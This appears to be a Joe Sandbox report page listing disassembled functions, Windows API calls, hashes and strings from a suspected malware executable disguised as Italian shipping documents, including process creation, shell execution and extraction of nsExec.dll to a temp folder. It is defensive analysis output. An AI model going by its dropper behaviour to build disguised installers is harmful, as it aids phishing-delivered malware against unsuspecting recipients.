Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764

Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D

Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C

Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B8C

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Non-executed Functions

Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA
C:\Users\user\AppData\Local\acneform, xrefs: 00404B17
Exec, xrefs: 00404B28, 00404B2D, 00404B38

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\acneform$Exec
API String ID: 2624150263-4003170230
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\acneform, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\acneform
API String ID: 542301482-531015130
Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

M, xrefs: 004050F7
, xrefs: 00405511
N, xrefs: 004051D8

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
